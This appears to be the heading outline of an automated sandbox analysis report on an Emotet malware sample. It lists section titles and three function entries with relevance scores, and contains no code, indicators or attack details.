Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

Function 10005AE0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162
librarymemorywindowCOMMON

Function 10004AE0, Relevance: 21.6, APIs: 4, Strings: 8, Instructions: 612
COMMON

Function 10028894, Relevance: 16.6, APIs: 11, Instructions: 106
memoryCOMMON